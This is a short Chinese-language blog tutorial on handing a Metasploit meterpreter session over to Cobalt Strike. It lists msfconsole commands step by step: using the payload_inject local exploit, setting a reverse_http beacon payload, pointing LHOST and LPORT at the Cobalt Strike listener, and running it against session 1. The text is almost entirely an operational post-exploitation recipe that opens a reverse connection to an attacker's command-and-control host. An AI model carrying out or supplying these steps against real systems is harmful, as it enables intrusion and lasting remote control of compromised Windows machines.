准备

首先msf获得一个meterpreter会话

把会话挂到后台,选用其他exploit用于传递会话

background

派生一个新的shell给cs,那么msf里面用到的exploit是

exploit/windows/local/payload_inject

操作
选用exploit

use exploit/windows/local/payload_inject

选择payload,选用的payload一定要跟cs下监听的payload方式一样

set payload windows/beacon_http/reverse_http

禁止产生一个新的handler

set disablepayloadhandler true

设置ip,ip为cs监听会话用的ip

set LHOST IP

设置端口,端口为cs对应的接受反弹shell的端口

    set LPORT 端口

设置需要派送的meterpreter

set session 1

开始执行

exploit

请输入图片描述
执行之后即可得到一个cs的会话
请输入图片描述

最后修改:2020 年 10 月 06 日
如果觉得我的文章对你有用,请随意赞赏